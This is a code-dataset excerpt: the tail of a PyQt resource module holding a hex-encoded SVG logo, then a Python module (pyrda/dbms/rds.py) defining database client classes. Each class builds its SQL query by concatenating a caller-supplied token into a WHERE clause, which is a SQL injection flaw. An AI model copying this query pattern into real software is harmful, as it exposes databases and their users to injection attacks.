\x2e\x38\x34\x35\x34\x37\x29\x22\x0d\x0a\x20\x20\x20\x20\x20\x20\
\x20\x69\x64\x3d\x22\x67\x34\x35\x35\x34\x22\x3e\x0d\x0a\x20\x20\
\x20\x20\x20\x20\x3c\x67\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\
\x20\x69\x64\x3d\x22\x67\x31\x30\x22\x3e\x0d\x0a\x20\x20\x20\x20\
\x20\x20\x20\x20\x3c\x70\x6f\x6c\x79\x67\x6f\x6e\x0d\x0a\x20\x20\
\x20\x20\x20\x20\x20\x20\x20\x20\x20\x63\x6c\x61\x73\x73\x3d\x22\
\x73\x74\x30\x22\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\
\x20\x70\x6f\x69\x6e\x74\x73\x3d\x22\x35\x36\x2c\x2d\x35\x36\x20\
\x32\x30\x30\x2c\x2d\x35\x36\x20\x31\x37\x36\x2c\x2d\x38\x20\x38\
\x30\x2c\x2d\x38\x20\x22\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\
\x20\x20\x20\x69\x64\x3d\x22\x70\x6f\x6c\x79\x67\x6f\x6e\x34\x22\
\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x73\x74\x79\
\x6c\x65\x3d\x22\x66\x69\x6c\x6c\x3a\x23\x34\x31\x63\x64\x35\x66\
\x3b\x66\x69\x6c\x6c\x2d\x6f\x70\x61\x63\x69\x74\x79\x3a\x30\x2e\
\x39\x34\x31\x31\x37\x36\x34\x37\x22\x20\x2f\x3e\x0d\x0a\x20\x20\
\x20\x20\x20\x20\x20\x20\x3c\x72\x65\x63\x74\x0d\x0a\x20\x20\x20\
\x20\x20\x20\x20\x20\x20\x20\x20\x78\x3d\x22\x35\x36\x22\x0d\x0a\
\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x79\x3d\x22\x2d\x38\
\x22\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x63\x6c\
\x61\x73\x73\x3d\x22\x73\x74\x31\x22\x0d\x0a\x20\x20\x20\x20\x20\
\x20\x20\x20\x20\x20\x20\x77\x69\x64\x74\x68\x3d\x22\x31\x34\x34\
\x22\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x68\x65\
\x69\x67\x68\x74\x3d\x22\x39\x36\x22\x0d\x0a\x20\x20\x20\x20\x20\
\x20\x20\x20\x20\x20\x20\x69\x64\x3d\x22\x72\x65\x63\x74\x36\x22\
\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x73\x74\x79\
\x6c\x65\x3d\x22\x66\x69\x6c\x6c\x3a\x23\x66\x66\x64\x38\x30\x66\
\x3b\x66\x69\x6c\x6c\x2d\x6f\x70\x61\x63\x69\x74\x79\x3a\x30\x2e\
\x39\x34\x31\x31\x37\x36\x34\x37\x22\x20\x2f\x3e\x0d\x0a\x20\x20\
\x20\x20\x20\x20\x20\x20\x3c\x70\x6f\x6c\x79\x67\x6f\x6e\x0d\x0a\
\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x63\x6c\x61\x73\x73\
\x3d\x22\x73\x74\x32\x22\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\
\x20\x20\x20\x70\x6f\x69\x6e\x74\x73\x3d\x22\x31\x32\x38\x2c\x38\
\x38\x20\x31\x37\x36\x2c\x2d\x38\x20\x38\x30\x2c\x2d\x38\x20\x22\
\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x69\x64\x3d\
\x22\x70\x6f\x6c\x79\x67\x6f\x6e\x38\x22\x0d\x0a\x20\x20\x20\x20\
\x20\x20\x20\x20\x20\x20\x20\x73\x74\x79\x6c\x65\x3d\x22\x66\x69\
\x6c\x6c\x3a\x23\x30\x30\x39\x33\x39\x66\x3b\x66\x69\x6c\x6c\x2d\
\x6f\x70\x61\x63\x69\x74\x79\x3a\x30\x2e\x39\x34\x31\x31\x37\x36\
\x34\x37\x22\x20\x2f\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x3c\x2f\
\x67\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x2f\x67\x3e\x0d\x0a\x20\x20\
\x3c\x2f\x67\x3e\x0d\x0a\x20\x20\x3c\x73\x74\x79\x6c\x65\x0d\x0a\
\x20\x20\x20\x20\x20\x69\x64\x3d\x22\x73\x74\x79\x6c\x65\x32\x22\
\x0d\x0a\x20\x20\x20\x20\x20\x74\x79\x70\x65\x3d\x22\x74\x65\x78\
\x74\x2f\x63\x73\x73\x22\x3e\x0d\x0a\x09\x2e\x73\x74\x30\x7b\x66\
\x69\x6c\x6c\x3a\x23\x32\x31\x32\x31\x32\x31\x3b\x7d\x0d\x0a\x09\
\x2e\x73\x74\x31\x7b\x66\x69\x6c\x6c\x3a\x23\x46\x46\x38\x30\x41\
\x42\x3b\x7d\x0d\x0a\x09\x2e\x73\x74\x32\x7b\x66\x69\x6c\x6c\x3a\
\x23\x46\x46\x31\x37\x34\x34\x3b\x7d\x0d\x0a\x3c\x2f\x73\x74\x79\
\x6c\x65\x3e\x0d\x0a\x3c\x2f\x73\x76\x67\x3e\x0d\x0a\
\x00\x00\x09\xcd\
\x3c\
\x3f\x78\x6d\x6c\x20\x76\x65\x72\x73\x69\x6f\x6e\x3d\x22\x31\x2e\
\x30\x22\x20\x65\x6e\x63\x6f\x64\x69\x6e\x67\x3d\x22\x55\x54\x46\
\x2d\x38\x22\x20\x73\x74\x61\x6e\x64\x61\x6c\x6f\x6e\x65\x3d\x22\
\x6e\x6f\x22\x3f\x3e\x0d\x0a\x3c\x21\x2d\x2d\x20\x47\x65\x6e\x65\
\x72\x61\x74\x6f\x72\x3a\x20\x41\x64\x6f\x62\x65\x20\x49\x6c\x6c\
\x75\x73\x74\x72\x61\x74\x6f\x72\x20\x31\x39\x2e\x30\x2e\x30\x2c\
\x20\x53\x56\x47\x20\x45\x78\x70\x6f\x72\x74\x20\x50\x6c\x75\x67\
\x2d\x49\x6e\x20\x2e\x20\x53\x56\x47\x20\x56\x65\x72\x73\x69\x6f\
\x6e\x3a\x20\x36\x2e\x30\x30\x20\x42\x75\x69\x6c\x64\x20\x30\x29\
\x20\x20\x2d\x2d\x3e\x0d\x0a\x0d\x0a\x3c\x73\x76\x67\x0d\x0a\x20\
\x20\x20\x78\x6d\x6c\x6e\x73\x3a\x64\x63\x3d\x22\x68\x74\x74\x70\
\x3a\x2f\x2f\x70\x75\x72\x6c\x2e\x6f\x72\x67\x2f\x64\x63\x2f\x65\
\x6c\x65\x6d\x65\x6e\x74\x73\x2f\x31\x2e\x31\x2f\x22\x0d\x0a\x20\
\x20\x20\x78\x6d\x6c\x6e\x73\x3a\x63\x63\x3d\x22\x68\x74\x74\x70\
\x3a\x2f\x2f\x63\x72\x65\x61\x74\x69\x76\x65\x63\x6f\x6d\x6d\x6f\
\x6e\x73\x2e\x6f\x72\x67\x2f\x6e\x73\x23\x22\x0d\x0a\x20\x20\x20\
\x78\x6d\x6c\x6e\x73\x3a\x72\x64\x66\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x31\x39\x39\
\x39\x2f\x30\x32\x2f\x32\x32\x2d\x72\x64\x66\x2d\x73\x79\x6e\x74\
\x61\x78\x2d\x6e\x73\x23\x22\x0d\x0a\x20\x20\x20\x78\x6d\x6c\x6e\
\x73\x3a\x73\x76\x67\x3d\x22\x68\x74\x74\x70\x3a\x2f\x2f\x77\x77\
\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\x30\x2f\x73\x76\
\x67\x22\x0d\x0a\x20\x20\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\
\x74\x70\x3a\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\
\x32\x30\x30\x30\x2f\x73\x76\x67\x22\x0d\x0a\x20\x20\x20\x78\x6d\
\x6c\x6e\x73\x3a\x73\x6f\x64\x69\x70\x6f\x64\x69\x3d\x22\x68\x74\
\x74\x70\x3a\x2f\x2f\x73\x6f\x64\x69\x70\x6f\x64\x69\x2e\x73\x6f\
\x75\x72\x63\x65\x66\x6f\x72\x67\x65\x2e\x6e\x65\x74\x2f\x44\x54\
\x44\x2f\x73\x6f\x64\x69\x70\x6f\x64\x69\x2d\x30\x2e\x64\x74\x64\
\x22\x0d\x0a\x20\x20\x20\x78\x6d\x6c\x6e\x73\x3a\x69\x6e\x6b\x73\
\x63\x61\x70\x65\x3d\x22\x68\x74\x74\x70\x3a\x2f\x2f\x77\x77\x77\
\x2e\x69\x6e\x6b\x73\x63\x61\x70\x65\x2e\x6f\x72\x67\x2f\x6e\x61\
\x6d\x65\x73\x70\x61\x63\x65\x73\x2f\x69\x6e\x6b\x73\x63\x61\x70\
\x65\x22\x0d\x0a\x20\x20\x20\x76\x65\x72\x73\x69\x6f\x6e\x3d\x22\
\x31\x2e\x31\x22\x0d\x0a\x20\x20\x20\x69\x64\x3d\x22\x63\x6f\x6e\
\x74\x65\x6e\x74\x22\x0d\x0a\x20\x20\x20\x78\x3d\x22\x30\x70\x78\
\x22\x0d\x0a\x20\x20\x20\x79\x3d\x22\x30\x70\x78\x22\x0d\x0a\x20\
\x20\x20\x76\x69\x65\x77\x42\x6f\x78\x3d\x22\x35\x36\x20\x2d\x35\
\x36\x20\x35\x31\x32\x20\x35\x31\x32\x22\x0d\x0a\x20\x20\x20\x78\
\x6d\x6c\x3a\x73\x70\x61\x63\x65\x3d\x22\x70\x72\x65\x73\x65\x72\
\x76\x65\x22\x0d\x0a\x20\x20\x20\x73\x6f\x64\x69\x70\x6f\x64\x69\
\x3a\x64\x6f\x63\x6e\x61\x6d\x65\x3d\x22\x6c\x6f\x67\x6f\x2e\x73\
\x76\x67\x22\x0d\x0a\x20\x20\x20\x77\x69\x64\x74\x68\x3d\x22\x35\
\x31\x32\x22\x0d\x0a\x20\x20\x20\x68\x65\x69\x67\x68\x74\x3d\x22\
\x35\x31\x32\x22\x0d\x0a\x20\x20\x20\x69\x6e\x6b\x73\x63\x61\x70\
\x65\x3a\x65\x78\x70\x6f\x72\x74\x2d\x66\x69\x6c\x65\x6e\x61\x6d\
\x65\x3d\x22\x2f\x68\x6f\x6d\x65\x2f\x79\x65\x69\x73\x6f\x6e\x2f\
\x44\x65\x76\x65\x6c\x6f\x70\x6d\x65\x6e\x74\x2f\x67\x63\x70\x64\
\x73\x2f\x70\x79\x73\x69\x64\x65\x2d\x6d\x61\x74\x65\x72\x69\x61\
\x6c\x2f\x64\x6f\x63\x73\x2f\x73\x6f\x75\x72\x63\x65\x2f\x5f\x73\
\x74\x61\x74\x69\x63\x2f\x6c\x6f\x67\x6f\x2e\x70\x6e\x67\x22\x0d\
\x0a\x20\x20\x20\x69\x6e\x6b\x73\x63\x61\x70\x65\x3a\x65\x78\x70\
\x6f\x72\x74\x2d\x78\x64\x70\x69\x3d\x22\x39\x36\x22\x0d\x0a\x20\
\x20\x20\x69\x6e\x6b\x73\x63\x61\x70\x65\x3a\x65\x78\x70\x6f\x72\
\x74\x2d\x79\x64\x70\x69\x3d\x22\x39\x36\x22\x0d\x0a\x20\x20\x20\
\x69\x6e\x6b\x73\x63\x61\x70\x65\x3a\x76\x65\x72\x73\x69\x6f\x6e\
\x3d\x22\x30\x2e\x39\x32\x2e\x34\x20\x35\x64\x61\x36\x38\x39\x63\
\x33\x31\x33\x2c\x20\x32\x30\x31\x39\x2d\x30\x31\x2d\x31\x34\x22\
\x3e\x3c\x6d\x65\x74\x61\x64\x61\x74\x61\x0d\x0a\x20\x20\x20\x69\
\x64\x3d\x22\x6d\x65\x74\x61\x64\x61\x74\x61\x31\x37\x22\x3e\x3c\
\x72\x64\x66\x3a\x52\x44\x46\x3e\x3c\x63\x63\x3a\x57\x6f\x72\x6b\
\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x72\x64\x66\x3a\x61\x62\x6f\
\x75\x74\x3d\x22\x22\x3e\x3c\x64\x63\x3a\x66\x6f\x72\x6d\x61\x74\
\x3e\x69\x6d\x61\x67\x65\x2f\x73\x76\x67\x2b\x78\x6d\x6c\x3c\x2f\
\x64\x63\x3a\x66\x6f\x72\x6d\x61\x74\x3e\x3c\x64\x63\x3a\x74\x79\
\x70\x65\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x72\x64\x66\
\x3a\x72\x65\x73\x6f\x75\x72\x63\x65\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x70\x75\x72\x6c\x2e\x6f\x72\x67\x2f\x64\x63\x2f\x64\x63\
\x6d\x69\x74\x79\x70\x65\x2f\x53\x74\x69\x6c\x6c\x49\x6d\x61\x67\
\x65\x22\x20\x2f\x3e\x3c\x64\x63\x3a\x74\x69\x74\x6c\x65\x3e\x3c\
\x2f\x64\x63\x3a\x74\x69\x74\x6c\x65\x3e\x3c\x2f\x63\x63\x3a\x57\
\x6f\x72\x6b\x3e\x3c\x2f\x72\x64\x66\x3a\x52\x44\x46\x3e\x3c\x2f\
\x6d\x65\x74\x61\x64\x61\x74\x61\x3e\x3c\x64\x65\x66\x73\x0d\x0a\
\x20\x20\x20\x69\x64\x3d\x22\x64\x65\x66\x73\x31\x35\x22\x20\x2f\
\x3e\x3c\x73\x6f\x64\x69\x70\x6f\x64\x69\x3a\x6e\x61\x6d\x65\x64\
\x76\x69\x65\x77\x0d\x0a\x20\x20\x20\x70\x61\x67\x65\x63\x6f\x6c\
\x6f\x72\x3d\x22\x23\x66\x66\x66\x66\x66\x66\x22\x0d\x0a\x20\x20\
\x20\x62\x6f\x72\x64\x65\x72\x63\x6f\x6c\x6f\x72\x3d\x22\x23\x36\
\x36\x36\x36\x36\x36\x22\x0d\x0a\x20\x20\x20\x62\x6f\x72\x64\x65\
\x72\x6f\x70\x61\x63\x69\x74\x79\x3d\x22\x31\x22\x0d\x0a\x20\x20\
\x20\x6f\x62\x6a\x65\x63\x74\x74\x6f\x6c\x65\x72\x61\x6e\x63\x65\
\x3d\x22\x31\x30\x22\x0d\x0a\x20\x20\x20\x67\x72\x69\x64\x74\x6f\
\x6c\x65\x72\x61\x6e\x63\x65\x3d\x22\x31\x30\x22\x0d\x0a\x20\x20\
\x20\x67\x75\x69\x64\x65\x74\x6f\x6c\x65\x72\x61\x6e\x63\x65\x3d\
\x22\x31\x30\x22\x0d\x0a\x20\x20\x20\x69\x6e\x6b\x73\x63\x61\x70\
\x65\x3a\x70\x61\x67\x65\x6f\x70\x61\x63\x69\x74\x79\x3d\x22\x30\
\x22\x0d\x0a\x20\x20\x20\x69\x6e\x6b\x73\x63\x61\x70\x65\x3a\x70\
\x61\x67\x65\x73\x68\x61\x64\x6f\x77\x3d\x22\x32\x22\x0d\x0a\x20\
\x20\x20\x69\x6e\x6b\x73\x63\x61\x70\x65\x3a\x77\x69\x6e\x64\x6f\
\x77\x2d\x77\x69\x64\x74\x68\x3d\x22\x31\x39\x32\x30\x22\x0d\x0a\
\x20\x20\x20\x69\x6e\x6b\x73\x63\x61\x70\x65\x3a\x77\x69\x6e\x64\
\x6f\x77\x2d\x68\x65\x69\x67\x68\x74\x3d\x22\x31\x30\x31\x35\x22\
\x0d\x0a\x20\x20\x20\x69\x64\x3d\x22\x6e\x61\x6d\x65\x64\x76\x69\
\x65\x77\x31\x33\x22\x0d\x0a\x20\x20\x20\x73\x68\x6f\x77\x67\x72\
\x69\x64\x3d\x22\x74\x72\x75\x65\x22\x0d\x0a\x20\x20\x20\x69\x6e\
\x6b\x73\x63\x61\x70\x65\x3a\x7a\x6f\x6f\x6d\x3d\x22\x30\x2e\x36\
\x31\x36\x33\x31\x39\x34\x35\x22\x0d\x0a\x20\x20\x20\x69\x6e\x6b\
\x73\x63\x61\x70\x65\x3a\x63\x78\x3d\x22\x31\x35\x36\x2e\x37\x34\
\x31\x38\x36\x22\x0d\x0a\x20\x20\x20\x69\x6e\x6b\x73\x63\x61\x70\
\x65\x3a\x63\x79\x3d\x22\x31\x30\x2e\x33\x31\x36\x38\x39\x32\x22\
\x0d\x0a\x20\x20\x20\x69\x6e\x6b\x73\x63\x61\x70\x65\x3a\x77\x69\
\x6e\x64\x6f\x77\x2d\x78\x3d\x22\x30\x22\x0d\x0a\x20\x20\x20\x69\
\x6e\x6b\x73\x63\x61\x70\x65\x3a\x77\x69\x6e\x64\x6f\x77\x2d\x79\
\x3d\x22\x30\x22\x0d\x0a\x20\x20\x20\x69\x6e\x6b\x73\x63\x61\x70\
\x65\x3a\x77\x69\x6e\x64\x6f\x77\x2d\x6d\x61\x78\x69\x6d\x69\x7a\
\x65\x64\x3d\x22\x31\x22\x0d\x0a\x20\x20\x20\x69\x6e\x6b\x73\x63\
\x61\x70\x65\x3a\x63\x75\x72\x72\x65\x6e\x74\x2d\x6c\x61\x79\x65\
\x72\x3d\x22\x63\x6f\x6e\x74\x65\x6e\x74\x22\x0d\x0a\x20\x20\x20\
\x73\x68\x6f\x77\x67\x75\x69\x64\x65\x73\x3d\x22\x66\x61\x6c\x73\
\x65\x22\x0d\x0a\x20\x20\x20\x66\x69\x74\x2d\x6d\x61\x72\x67\x69\
\x6e\x2d\x74\x6f\x70\x3d\x22\x30\x22\x0d\x0a\x20\x20\x20\x66\x69\
\x74\x2d\x6d\x61\x72\x67\x69\x6e\x2d\x6c\x65\x66\x74\x3d\x22\x30\
\x22\x0d\x0a\x20\x20\x20\x66\x69\x74\x2d\x6d\x61\x72\x67\x69\x6e\
\x2d\x72\x69\x67\x68\x74\x3d\x22\x30\x22\x0d\x0a\x20\x20\x20\x66\
\x69\x74\x2d\x6d\x61\x72\x67\x69\x6e\x2d\x62\x6f\x74\x74\x6f\x6d\
\x3d\x22\x30\x22\x20\x2f\x3e\x0d\x0a\x3c\x73\x74\x79\x6c\x65\x0d\
\x0a\x20\x20\x20\x74\x79\x70\x65\x3d\x22\x74\x65\x78\x74\x2f\x63\
\x73\x73\x22\x0d\x0a\x20\x20\x20\x69\x64\x3d\x22\x73\x74\x79\x6c\
\x65\x32\x22\x3e\x0d\x0a\x09\x2e\x73\x74\x30\x7b\x66\x69\x6c\x6c\
\x3a\x23\x32\x31\x32\x31\x32\x31\x3b\x7d\x0d\x0a\x09\x2e\x73\x74\
\x31\x7b\x66\x69\x6c\x6c\x3a\x23\x46\x46\x38\x30\x41\x42\x3b\x7d\
\x0d\x0a\x09\x2e\x73\x74\x32\x7b\x66\x69\x6c\x6c\x3a\x23\x46\x46\
\x31\x37\x34\x34\x3b\x7d\x0d\x0a\x3c\x2f\x73\x74\x79\x6c\x65\x3e\
\x0d\x0a\x3c\x67\x0d\x0a\x20\x20\x20\x69\x64\x3d\x22\x67\x34\x35\
\x35\x34\x22\x0d\x0a\x20\x20\x20\x74\x72\x61\x6e\x73\x66\x6f\x72\
\x6d\x3d\x22\x6d\x61\x74\x72\x69\x78\x28\x33\x2e\x35\x35\x35\x35\
\x35\x35\x36\x2c\x30\x2c\x30\x2c\x33\x2e\x35\x35\x35\x35\x35\x35\
\x36\x2c\x2d\x31\x34\x33\x2e\x31\x31\x31\x31\x31\x2c\x31\x34\x33\
\x2e\x31\x31\x31\x31\x31\x29\x22\x3e\x3c\x67\x0d\x0a\x20\x20\x20\
\x20\x20\x69\x64\x3d\x22\x67\x31\x30\x22\x3e\x0d\x0a\x09\x3c\x70\
\x6f\x6c\x79\x67\x6f\x6e\x0d\x0a\x20\x20\x20\x73\x74\x79\x6c\x65\
\x3d\x22\x66\x69\x6c\x6c\x3a\x23\x34\x31\x63\x64\x35\x66\x3b\x66\
\x69\x6c\x6c\x2d\x6f\x70\x61\x63\x69\x74\x79\x3a\x30\x2e\x39\x34\
\x31\x31\x37\x36\x34\x37\x22\x0d\x0a\x20\x20\x20\x69\x64\x3d\x22\
\x70\x6f\x6c\x79\x67\x6f\x6e\x34\x22\x0d\x0a\x20\x20\x20\x70\x6f\
\x69\x6e\x74\x73\x3d\x22\x31\x37\x36\x2c\x2d\x38\x20\x38\x30\x2c\
\x2d\x38\x20\x35\x36\x2c\x2d\x35\x36\x20\x32\x30\x30\x2c\x2d\x35\
\x36\x20\x22\x0d\x0a\x20\x20\x20\x63\x6c\x61\x73\x73\x3d\x22\x73\
\x74\x30\x22\x20\x2f\x3e\x0d\x0a\x09\x3c\x72\x65\x63\x74\x0d\x0a\
\x20\x20\x20\x73\x74\x79\x6c\x65\x3d\x22\x66\x69\x6c\x6c\x3a\x23\
\x66\x66\x64\x38\x30\x66\x3b\x66\x69\x6c\x6c\x2d\x6f\x70\x61\x63\
\x69\x74\x79\x3a\x30\x2e\x39\x34\x31\x31\x37\x36\x34\x37\x22\x0d\
\x0a\x20\x20\x20\x69\x64\x3d\x22\x72\x65\x63\x74\x36\x22\x0d\x0a\
\x20\x20\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x39\x36\x22\x0d\x0a\
\x20\x20\x20\x77\x69\x64\x74\x68\x3d\x22\x31\x34\x34\x22\x0d\x0a\
\x20\x20\x20\x63\x6c\x61\x73\x73\x3d\x22\x73\x74\x31\x22\x0d\x0a\
\x20\x20\x20\x79\x3d\x22\x2d\x38\x22\x0d\x0a\x20\x20\x20\x78\x3d\
\x22\x35\x36\x22\x20\x2f\x3e\x0d\x0a\x09\x3c\x70\x6f\x6c\x79\x67\
\x6f\x6e\x0d\x0a\x20\x20\x20\x73\x74\x79\x6c\x65\x3d\x22\x66\x69\
\x6c\x6c\x3a\x23\x30\x30\x39\x33\x39\x66\x3b\x66\x69\x6c\x6c\x2d\
\x6f\x70\x61\x63\x69\x74\x79\x3a\x30\x2e\x39\x34\x31\x31\x37\x36\
\x34\x37\x22\x0d\x0a\x20\x20\x20\x69\x64\x3d\x22\x70\x6f\x6c\x79\
\x67\x6f\x6e\x38\x22\x0d\x0a\x20\x20\x20\x70\x6f\x69\x6e\x74\x73\
\x3d\x22\x31\x37\x36\x2c\x2d\x38\x20\x38\x30\x2c\x2d\x38\x20\x31\
\x32\x38\x2c\x38\x38\x20\x22\x0d\x0a\x20\x20\x20\x63\x6c\x61\x73\
\x73\x3d\x22\x73\x74\x32\x22\x20\x2f\x3e\x0d\x0a\x3c\x2f\x67\x3e\
\x3c\x2f\x67\x3e\x0d\x0a\x3c\x2f\x73\x76\x67\x3e\
"
qt_resource_name = b"\
\x00\x04\
\x00\x06\xfa\x5e\
\x00\x69\
\x00\x63\x00\x6f\x00\x6e\
\x00\x04\
\x00\x07\x35\xdf\
\x00\x6c\
\x00\x6f\x00\x67\x00\x6f\
\x00\x0e\
\x0f\xfe\xfd\x07\
\x00\x6c\
\x00\x6f\x00\x67\x00\x6f\x00\x5f\x00\x66\x00\x72\x00\x61\x00\x6d\x00\x65\x00\x2e\x00\x73\x00\x76\x00\x67\
\x00\x08\
\x05\xe2\x54\xa7\
\x00\x6c\
\x00\x6f\x00\x67\x00\x6f\x00\x2e\x00\x73\x00\x76\x00\x67\
"
qt_resource_struct_v1 = b"\
\x00\x00\x00\x00\x00\x02\x00\x00\x00\x01\x00\x00\x00\x01\
\x00\x00\x00\x00\x00\x02\x00\x00\x00\x01\x00\x00\x00\x02\
\x00\x00\x00\x0e\x00\x02\x00\x00\x00\x02\x00\x00\x00\x03\
\x00\x00\x00\x3e\x00\x00\x00\x00\x00\x01\x00\x00\x15\xd2\
\x00\x00\x00\x1c\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\
"
qt_resource_struct_v2 = b"\
\x00\x00\x00\x00\x00\x02\x00\x00\x00\x01\x00\x00\x00\x01\
\x00\x00\x00\x00\x00\x00\x00\x00\
\x00\x00\x00\x00\x00\x02\x00\x00\x00\x01\x00\x00\x00\x02\
\x00\x00\x00\x00\x00\x00\x00\x00\
\x00\x00\x00\x0e\x00\x02\x00\x00\x00\x02\x00\x00\x00\x03\
\x00\x00\x00\x00\x00\x00\x00\x00\
\x00\x00\x00\x3e\x00\x00\x00\x00\x00\x01\x00\x00\x15\xd2\
\x00\x00\x01\x74\x54\x97\xcd\xe2\
\x00\x00\x00\x1c\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\
\x00\x00\x01\x74\x54\x97\xcd\xe2\
"
qt_version = QtCore.qVersion().split('.')
if qt_version < ['5', '8', '0']:
rcc_version = 1
qt_resource_struct = qt_resource_struct_v1
else:
rcc_version = 2
qt_resource_struct = qt_resource_struct_v2
def qInitResources():
QtCore.qRegisterResourceData(rcc_version, qt_resource_struct, qt_resource_name, qt_resource_data)
def qCleanupResources():
QtCore.qUnregisterResourceData(rcc_version, qt_resource_struct, qt_resource_name, qt_resource_data)
qInitResources()
| 61.015544 | 105 | 0.726846 | 8,475 | 35,328 | 3.025369 | 0.017345 | 0.206396 | 0.233775 | 0.214353 | 0.913456 | 0.90468 | 0.896334 | 0.886856 | 0.879719 | 0.85702 | 0 | 0.412623 | 0.018739 | 35,328 | 578 | 106 | 61.121107 | 0.327006 | 0.004274 | 0 | 0.104982 | 0 | 0.921708 | 0.000114 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0.003559 | false | 0 | 0.001779 | 0 | 0.005338 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 13 |
52bd64bf3ae950d18ba1455eacc87da680e8de49 | 4,868 | py | Python | pyrda/dbms/rds.py | takewiki/pyrda | 0b6644f5296c8e3a614f9127eaaa8011b59450ec | [
"Apache-2.0"
] | null | null | null | pyrda/dbms/rds.py | takewiki/pyrda | 0b6644f5296c8e3a614f9127eaaa8011b59450ec | [
"Apache-2.0"
] | null | null | null | pyrda/dbms/rds.py | takewiki/pyrda | 0b6644f5296c8e3a614f9127eaaa8011b59450ec | [
"Apache-2.0"
] | null | null | null | import pymssql
#local mode
#from pyrda.dbms.mssql import MsSqlClient
#from pyrda.dbms.mysql import MysqlClient
#from config import cfg_setting
#package mode
from .mssql import MsSqlClient
from .mysql import MySqlClient
from .config import cfg_setting
class RdClient(MsSqlClient):
def __init__(self,token,as_dict=True):
ip = cfg_setting['host'] + '8'
user_name = cfg_setting['user']
password = cfg_setting['password'] +'@'
db_name = cfg_setting['database'] +'gox'
sql = cfg_setting['sql'] + " where FToken ='" + token+ "'"
connect = pymssql.connect(server=ip,user=user_name,password=password,database=db_name,as_dict=False,charset='cp936')
cursor = connect.cursor()
cursor.execute(sql)
login = cursor.fetchall() # 读取查询结果,
cursor.close() # 关闭游标
ncount = len(login)
if ncount >0:
self.ip = login[0][0]
self.user_name = login[0][1]
self.password = login[0][2]
self.db_name = login[0][3]
self.port = login[0][4]
self.dbType = login[0][5]
self.FOwnerName = login[0][6]
self.as_dict = as_dict
MsSqlClient.__init__(self, ip=self.ip,port=self.port, user_name=self.user_name, password=self.password, db_name=self.db_name,as_dict=self.as_dict)
def ownerName(self):
return(self.FOwnerName)
class RdSqlServer(MsSqlClient):
def __init__(self,token,as_dict=True):
ip = cfg_setting['host'] + '8'
user_name = cfg_setting['user']
password = cfg_setting['password'] +'@'
db_name = cfg_setting['database'] +'gox'
sql = cfg_setting['sql'] + " where FToken ='" + token+ "'"
connect = pymssql.connect(server=ip,user=user_name,password=password,database=db_name,as_dict=False,charset='cp936')
cursor = connect.cursor()
cursor.execute(sql)
login = cursor.fetchall() # 读取查询结果,
cursor.close() # 关闭游标
ncount = len(login)
if ncount >0:
self.ip = login[0][0]
self.user_name = login[0][1]
self.password = login[0][2]
self.db_name = login[0][3]
self.port = login[0][4]
self.dbType = login[0][5]
self.FOwnerName = login[0][6]
self.as_dict = as_dict
MsSqlClient.__init__(self, ip=self.ip,port=self.port, user_name=self.user_name, password=self.password, db_name=self.db_name,as_dict=self.as_dict)
def ownerName(self):
return(self.FOwnerName)
class RdMsSql(MsSqlClient):
def __init__(self,token,as_dict=True):
ip = cfg_setting['host'] + '8'
user_name = cfg_setting['user']
password = cfg_setting['password'] +'@'
db_name = cfg_setting['database'] +'gox'
sql = cfg_setting['sql'] + " where FToken ='" + token+ "'"
connect = pymssql.connect(server=ip,user=user_name,password=password,database=db_name,as_dict=False,charset='cp936')
cursor = connect.cursor()
cursor.execute(sql)
login = cursor.fetchall() # 读取查询结果,
cursor.close() # 关闭游标
ncount = len(login)
if ncount >0:
self.ip = login[0][0]
self.user_name = login[0][1]
self.password = login[0][2]
self.db_name = login[0][3]
self.port = login[0][4]
self.dbType = login[0][5]
self.FOwnerName = login[0][6]
self.as_dict = as_dict
MsSqlClient.__init__(self, ip=self.ip,port=self.port, user_name=self.user_name, password=self.password, db_name=self.db_name,as_dict=self.as_dict)
def ownerName(self):
return(self.FOwnerName)
class RdMySql(MySqlClient):
def __init__(self,token,as_dict=True):
ip = cfg_setting['host'] + '8'
user_name = cfg_setting['user']
password = cfg_setting['password'] +'@'
db_name = cfg_setting['database'] +'gox'
sql = cfg_setting['sql'] + " where FToken ='" + token+ "'"
connect = pymssql.connect(server=ip,user=user_name,password=password,database=db_name,as_dict=False,charset='cp936')
cursor = connect.cursor()
cursor.execute(sql)
login = cursor.fetchall() # 读取查询结果,
cursor.close() # 关闭游标
ncount = len(login)
if ncount >0:
self.ip = login[0][0]
self.user_name = login[0][1]
self.password = login[0][2]
self.db_name = login[0][3]
self.port = login[0][4]
self.dbType = login[0][5]
self.FOwnerName = login[0][6]
self.as_dict = as_dict
